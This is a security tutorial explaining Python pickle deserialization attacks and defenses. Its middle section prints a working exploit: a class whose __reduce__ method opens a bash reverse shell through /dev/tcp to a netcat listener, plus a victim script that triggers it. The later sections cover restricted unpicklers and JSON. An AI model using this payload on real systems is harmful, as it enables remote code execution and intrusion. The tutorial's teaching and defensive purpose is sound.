

Python Deserialization Attacks Explained: How Hackers Exploit Pickle (and How to Defend)
Table of Contents
Heard someone talk about .NET serialization? Vulnerabilities involving byte streams? Something like that?
You might not have, but deserialization bugs are common, powerful and often misunderstood.
Let’s have a deep tech talk about deserialization attacks, focusing on Python - we’ll later come to .NET and Ruby, in other posts.
Introduction to Python Deserialization Attacks
Serialization is the “process of converting a data structure or object into a byte stream” ; meaning it serves to safe data into a file easily and then transmit them over a network. The reverse process of that is Deserialization, converting byte streams back into the data’s/ object’s original structure.
Serialization is kind of like freezing an object in time - deserialization is waking it back up.
However, this convenient process can be extremely dangerous; deserializing user-supplied data without strict controls, you might just wake up a bomb.
What are Deserialization Attacks?
Deserialization attacks names attackers embedding malicious code in serialized data, which will end up being executed upon deserialization.
You can read more about the formal definition and risk management perspective of that here: https://owasp.org/www-community/vulnerabilities/Insecure_Deserialization
How Python’s Pickle Module Works (Serialization & Deserialization Explained)
In this section, i’m referencing this great article , be sure to check it out and see how they explain!
Hackers love Python’s Pickle module - and not because it’s tasty. In the wrong hands, Pickle can turn your server into an open door for remote code execution. In this guide, you’ll learn how Python deserialization attacks work, see a real exploit in action, and learn exactly how to defend against them.
pickle
is included in the Python standard library, so no need to install it.
It mainly serves to (de-)serialize Python objects, whether that be simple data or complex structures like dictionaries.
Serializing Python Code
import pickle
data = {
'Name': 'James Bond',
'Rank': 'Commander, Royal Navy Reserve',
'Birthday': '13. April 1968',
'Hair': 'Sandy brown, short'
}
with open('bond.pickle', 'wb') as handle:
pickle.dump(data, handle)
data_bytes = pickle.dumps(data)
print(data_bytes)
pickle.dump
writes the serialized object into our specified file, pickle.dumps
returns a byte stream containing the serialized data:
Serialized Object: Showcase
b'\x80\x04\x95x\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04Name\x94\x8c\nJames Bond\x94\x8c\x04Rank\x94\x8c\x1dCommander, Royal Navy Reserve\x94\x8c\x08Birthday\x94\x8c\x0e13. April 1968\x94\x8c\x04Hair\x94\x8c\x12Sandy brown, short\x94u.'
Protocol Note
When using
pickle.dump
, it is recommended to provideprotocol=pickle.HIGHEST_PROTOCOL
as parameter, to ensure newest standards (though this won’t help you with security!).
Deserializing Python code
If you want to reverse what we just did, follow along:
import pickle
with open('bond.pickle', 'rb') as handle:
data = pickle.load(handle)
print(data)
outputs (who would’ve thought):
{'Name': 'James Bond', 'Rank': 'Commander, Royal Navy Reserve', 'Birthday': '13. April 1968', 'Hair': 'Sandy brown, short'}
You can also directly deserialize a byte stream: data = pickle.loads(data_bytes)
.
Now, onto the real deal: Should we do a real deserialization example? Yaaay!
Exploiting Python Pickle Deserialization Vulnerabilities – A Step-by-Step Example
Let’s say we find a Python web application that accepts user-supplied data, stores it as a pickled object, and later loads it for session handling, caching, or state restoration.
Here’s a vulnerable snippet simulating that behavior:
Vulnerable code
import pickle
def load_user_data(serialized_data):
return pickle.loads(serialized_data)
# Simulated untrusted input from user/session/cookie etc.
user_input = input("Paste your serialized data: ").encode()
user_data = load_user_data(user_input)
This code blindly deserializes whatever input it receives. Now let’s exploit it.
Crafting a Malicious Payload
We’ll build a Python class that triggers arbitrary command execution upon deserialization - using the __reduce__()
method.
Step 1: Attacker creates and saves malicious pickle
# attacker.py
import pickle
import os
class Exploit:
def __reduce__(self):
return (os.system, ('/bin/bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"',))
payload = pickle.dumps(Exploit())
with open("malicious.pkl", "wb") as f:
f.write(payload)
print("[*] Malicious pickle written to file.")
This simulates the attacker crafting a payload and sending it to the server (via a file, cookie, request, etc.).
Step 2: Victim deserializes the malicious object
# victim.py
import pickle
with open("malicious.pkl", "rb") as f:
data = f.read()
print("[*] Deserializing received object...")
pickle.loads(data)
Step 3: Simulate
Start nc -lvnp 4444
in a terminal on your computer.
After having added chmod +x attacker.py
and chmod +x victim.py
:
In a second Terminal, run python3 attacker.py
, serializing our payload.
Then, you can pretend you were the unknowing victim (e.g. the mentioned web app) and run python3 victim.py
. See what happens!
How to Defend Against Python Deserialization Attacks
Principle of Secure Deserialization
The number one rule is simple: Never deserialize data from untrusted sources.
Python’s pickle
module is powerful - but also dangerous. It was never designed for secure use with external input. If an attacker can influence the serialized data, they can embed malicious logic that executes arbitrary code at deserialization time.
Even if you’re deserializing internal data, it’s worth asking: “What happens if this data gets tampered with?”
Option 1: Restrict What Can Be Deserialized
If you must use pickle
, consider tightly controlling what types can be reconstructed. One way to do this is by subclassing pickle.Unpickler
and overriding its behavior.
Example: Safe Unpickler with Type Restrictions
import pickle
import types
import io
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
# Only allow safe built-in types
if module == "builtins" and name in {"str", "list", "dict", "set", "int", "float", "bool"}:
return getattr(__import__(module), name)
raise pickle.UnpicklingError(f"Attempted to load forbidden class: {module}.{name}")
def restricted_loads(s):
return RestrictedUnpickler(io.BytesIO(s)).load()
Usage:
data = restricted_loads(serialized_input)
This approach lets you deserialize known-safe types like dictionaries or strings, but blocks all function references, classes, and system calls that attackers often use in exploits.
Caveat: This still isn’t bulletproof. It’s a band-aid over a fundamentally unsafe mechanism. Avoid
pickle
entirely for any remotely user-controlled input.
Option 2: Use a Safer Format – JSON
In most cases, you don’t need pickle
. If your app just stores basic data like strings, numbers, lists, or dictionaries - use json
.
- It’s safer: no code execution risk
- It’s portable: works across languages
- It’s readable and debuggable
Example:
import json
# Serialize
data = {'username': 'alice', 'roles': ['user', 'admin']}
data_json = json.dumps(data)
# Deserialize
data = json.loads(data_json)
JSON won’t let you encode custom Python objects or functions - and that’s exactly why it’s safe.
TL;DR Defensive Checklist
✅ Safe Practice | 🚫 Avoid |
---|---|
Use json , yaml.safe_load , or custom schemas |
pickle.loads() on untrusted data |
If using pickle , restrict types with a custom Unpickler |
Using eval() or marshal with user input |
Validate and sanitize all input before deserialization | Blindly trusting data from files, cookies, or sessions |
Bonus Tip: Log What You’re Deserializing
In applications that require complex data loading, log the structure of what you’re deserializing before acting on it. This can catch anomalies and help with incident response if things go wrong.